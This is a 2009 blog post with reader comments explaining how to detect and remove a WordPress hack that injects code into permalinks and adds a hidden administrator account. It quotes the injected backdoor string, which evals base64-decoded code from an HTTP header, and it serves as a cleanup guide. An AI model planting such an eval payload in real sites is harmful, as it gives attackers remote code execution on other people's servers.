If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.
To fix things:
- go to Setting->Permalinks and delete the above mean code
- go to users, you will notice there are more administrators than usual
Put your mouse over the users and find the one that is last to register like this
Right click and copy the edit url, then paste it into the address bar. Also increase the number by 1.
You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber then return to users and delete him.
Check the source of the page with administrators just in case, even if you don’t see something odd. On some older version the hack hides the increased number of admins too. If that doesn’t work right click somehwere on the background and select ‘View Source’ then use search terms like ‘administrator’ or ‘user_’ to find out the id of the hidden admin. Then copy the edit url and replace the id, make him a subscriber and delete it like I explained above.
This should fix it. Don’t forget to upgrade your blog to the latest version.
*This was written in a rush to help you so please forgive the errors. 
Subscribe...
To my feed via RSS 
. (?) or via email.
if not, come back tomorrow on journeyetc.com and see what's new :)
Thanks for this quick writeup, there seems to have been an outbreak of this over the past few days. My blog (running v2.6.3) was compromised too.
I would also recommend upgrading to the latest WordPress version immediately after fixing the issue, although it hasn’t been verified that 2.8.4 is not vulnerable, as far as I know.
I am hoping the WordPress guys will make some sort of an official announcement about this, because the problem seems to be really widespread.
[...] the end of url links breaking them Check to if you have new admins added to your WordPress too. WordPress Permalink & Rss problems seems to have the latest update info, hope it [...]
[...] [...]
This works perfect.. except i found the secret admin profile by adding 1 to my total amount of users.. like if u have 10234 users signed up.. use 10235…. thanks alot
Hey – thanks for this well written post!!
Thank you for the fix! When I saw that our site had been hacked I thought I was going to have to spend the rest of the day trying to fix it but your instructions were right on the money and I had the site back up and running within a few minutes. THANK YOU!
-tory
Cleared out the permalink but I can’t find the missing user! Please help!
from SSH :
grep -H -r “var setUserName = function” /var/lib/mysql
…
after this use phpMyAdmin and search string in infected database (result from grep) … browse result
1. remember all “user_id” value from wp_usermeta table where meta_key = “first_name”
2. from wp_users table remove all rows (users) with ID = user_id
3. remove row from wp_usermeta table where meta_key = “first_name”.
—
set again permalinks from wordpress admin (with real one)
—
clear all files from wordpress cache, etc…
Yes – thanks for having this here. Easy fix. Do we know for sure that there are no lingering repurcussions? Some sort of trojan that was put into the blog or backend that will unveil itself down the road despite these fixes, and despite upgraded to 2.8.4?
Thanks so much for the help. It was an easy fix and understandable.
@aw – I’ve not heard of any more issues so far. I will update if there will be.
@Jeffrey – Look at the picture. Search the user with the highest number and increase it with 1.
@Byrev – ms
THANKS very much for this posting. I have published another method of finding and removing the hidden user, and it doesn’t require SSH access to your web server. More details are in my blog at:
http://blog.nachotech.com/?p=125
Cheers,
Iggy
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/ Notas:d+ [?] [?] ¿Te gustó este post? [...]
[...] Today I found my permalinks were all screwed up, and guess what I found another admin popped up from who knows where. Was easy enough to fix once I found this article, http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/. [...]
Looks like no admin users are added to WordPress 2.7, although the permalinks are still broken. Can anyone else confirm?
[...] http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/ [...]
I had this hack happen to me today with this string:
/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
There was NO additional admin added.
WP 2.82.
What is interesting is that the hacker somehow disabled the tools–>upgrade code. It normally tells you you have 2.82 and need to upgrade to 2.84. The bottom of the screen showed the need to upgrade, but the code at under the upgrade tool said it was at latest version with no upgrade needed!
Thank you very much for writing this post — I have used it to resolve this issue on a student blog. I wouldn’t have figured it out as quickly without your help!
[...] yang tidak kita kenal. Sangat mungkin sekali kita tidak bisa mengakses akun siluman ini. Baca di Journey Etc untuk mengetahui [...]
Awesome and helpful. I used this simple system to delete the rogue admin and restore normalcy to my blog. Thank you very much!
All success
Dr.Mani
[...] Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] 0 Hey WordPress liefhebber! Wil je op de hoogte blijven van nieuwe blogposts, blijf dan bij via onze RSS feed of Twitter profiel.Op dit moment worden worden er heel veel oude WordPress installaties aangevallen door kwaadwillenden. Otto, een key developer van WordPress kwam met deze melding. Er zijn twee manieren om er achter te komen of je WordPress installatie getroffen is: There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.” The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
Thanks, this helped a lot…..
Thank you so much for this, getting rid of the blighter was doing my head in. It has taught me a valuable lesson in keeping secure.
If you are having trouble locating the user ID, I found the hidden administrator by opening up the HTML brower source in notepad and checking through users that way. It says exactly what user ID the hacker administrator is.
Thanks
[...] more here and there will no doubt be plenty coming on WordPress itself and further advice appearing online as [...]
[...] This post offers some solutions if you have already been hacked. Remove the extra permalink code in Settings → Permalinks, remove the extra admin account, and (obviously) upgrade to the latest version of WordPress. [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
Thanks so much! None of the permalinks in my 3 WP installations were affected, but I found a hidden Administrator in my travel log. Using the tips from here: http://blog.nachotech.com/?p=125, I found its userid via pagesource and then deleted it – only to have another one pop up, and then another one (I could actually see them appear when I clicked refresh). After that I finally managed to upgrade, and now it seems fine… *crosses fingers*
@Admin any time
have a nice blogging !
[...] (2)” eller ett namn som du inte känner igen. Du kommer antagligen inte åt kontot, men Journey Etc har en möjlig [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] If you can no longer log in, check out this possible solution. [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
Thank you for this posting.
I translated the solution into Japanese and posted it at http://sakuratan.biz/archives/1204. (Please contact me if you don’t want to permit me the translation.)
Thanks!
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.” [...]
[...] WordPress Permalink and RSS Problems [...]
[...] http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/ [...]
The secret user’s first name is a javascript function. I won’t reproduce it here but… injection attack? After all this time? Is that the vulnerability or did the hack happen some other way?
Thanks so much for posting this! I only have one admin (me), so I did a “view source” and searched for “administrator” and found the hidden name. In case that helps anyone.
Thanks again!
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] You will notice the hack as it leaves a bunch of code in the permalinks. You can read more about it here as well as a solution. Journeyetc.com. [...]
To find the hidden admin you may need to set the user_ID field to +2 instead of +1. This was require in my case.
If you’re handy with phpadmin you can browse the wp_users table and look at the last record to fetch the user_ID.
I’ve had the same hack with the permalink problem, and that was an easy fix. I also now have a hidden administrator and have found the user ID in the source code. I must be braindead right now though, I am not understanding your guide on how to get rid of this user (overcomplicating and overlooking the simple and obvious most likely) . You said “paste into address bar”, are you referring to the browser nav bar? That gets me no where, and the only other place I can see to paste is into the search bar on the admin user page and that isn’t getting me anywhere either.
Please disregard my last comment, I answered my own question. After rethinking what I was doing, I was just overcomplicating my thought process. Went back had another look and the answer was right in front of me. Hidden user and malicious java script are now gone.
[...] found another great article from Journey etc explaining a different way to find a hidden [...]
Scooter, same problem. how did you go about searching?
Ok, got it. Just pasted it after the url of WP admin. Btw, the hidden admi name is monroeescobar72. Any similarities with others?
Had to delete about 10 legitimate users in a failed trial and error, too.
Unable to locate the hidden admin.
I upgraded my blog two days back . But my blog ( wp ver 2.8.4) was attacked today. I fixed the permalink, as per your instructions and it seems the issue is resolved or is there any other method to find the hidden user?
Thanks a ton for this post.
One seemingly reliable I was able to find the rogue account(s) was by querying the database. I don’t expect everyone to have access to their database, but querying ‘wp_users’ for any user who does not have an email address for us brought up the rogue admin account.
I have updated my instructions on finding and removing the hidden user(s). Perhaps some of you will find it helpful:
http://blog.nachotech.com/?p=125
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
Thank you, this was tremendously helpful.
[...] quick fix was to edit my permalink settings, removing the funky [...]
[...] journeyetc.com responded and describe the attack: [...]
[...] and here [...]
[...] If you’ve already been cyber-robbed, the instructions I used to fix Foodie Fights were on Journey Etc. The comments were helpful [...]
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
I followed your instructions and I reset the permalinks. So am I clean ? I asked the question on the wordpress forum and they suggested your fix was not enough and that I needed to completely reload all the files including plug ins with new, clean versions. That seems a lot of work to me if I don need to.
I deleted the rogue “administrator” by going through the database and looking up wp_users. The last one had no email address, and searching for the user name in WordPress Users section came up empty, so that had to be the hidden one.
[...] http://www.journeyetc.com/uncategorized/wordpress-permalink-rss-problems/ [...]
YOU SAVED MY BLOG.
I love you.
Thank you.
I did not see any new Administrator’s, but I tried your trick of adding 1 and did not get a “rogue” administrator. Through PHPMyAdmin I went Into my Database and did not see any new users in wp_users or wp_usermeta. Has anyone heard of this permalink hack, not adding a “rogue” administrator? I’m worried I’ve missed something but tried everything I can think of.
[...] WP Permalink RSS problems. [...]
I am trying to help a friend with an infected installation. When I go to users I see two admin, yet when I click the admin tab it changes to 1 (and it is my friend’s admin listing). When I try to view source my virus scanner detects a couple of malicious entities (for lack a better word – haha) and it won’t let me see the source. I also tried scanning down through the list of subscribers (there are lots) – on page 8 I quickly saw an administrator, but it disappeared right away and the virus scanner kicked in again.
Any thoughts?
Can I physically remove this admin entry from within pHpmyadmin?
Thanks
[...] More information on how to deal with this hack can be found on the weblog Journey Etc.. [...]
Can I physically remove this admin entry from within pHpmyadmin
hi, really great post, i hope to read more post from your amazing blog, you are wellcome to read about visiting israel at Christmas holyday ! its realy great time
Excuse me for writing Off-Topic … which WP template are you using? Looks awesome!!
Hey,
Thanks for the compliments. I’m using the ‘Journey Theme’. It is custom made, so you won’t be able to find it elsewhere. If you are interested to get in touch with the people who made it, let me know – it cost about $450 (design+coding)
How to remove Trojan: Backdoor
http://www.tips29.com/2009/01/how-to-remove-trojan-backdoor.html
Hi, great post & helpful comments but after having found the ‘hidden’ user, I still don’t see how to get the url to paste into the browser…it doesn’t seem to be there. Is there a way I can delete it directly from the users.php file? Thanks.
[...] After a long search in the Internet, I found a crude way to solve it thanks to http://www.journeyetc.com/uncategorized/wordpress-permalink-rss-problems/ [...]
[...] 2. Adanya sebuah “backdoor” yang dibuat oleh “hidden” Administrator. Anda bisa mencurigai user bernama “Administrator (2)” atau apa saja yang tidak anda kenal. Untuk beberapa saat kemudian mungkin anda tidak akan bisa mengakses dashboard administrator. Untuk solusi termudah masalah ini silahkan baca dipostingan Journey Etc blog’s. [...]
That’s why people should not use open source software.
Great post. I agree with masterb
Thanks so much… Problem solved!
[...] > WordPress Permalink RSS problems [...]
[...] gerekli. Yap?lan aç?klamay? okumak için buray?, konu ile ilgili çözüm önerisi için ise buray? inceleyiniz. Ayr?ca konu ile ilgili forumdaki bir tart??may? da buradaninceleyebilirsiniz. [...]
F*ckin’ tremendous issues here. I’m very happy to see your post. Thank you a lot and i’m looking forward to touch you. Will you kindly drop me a e-mail?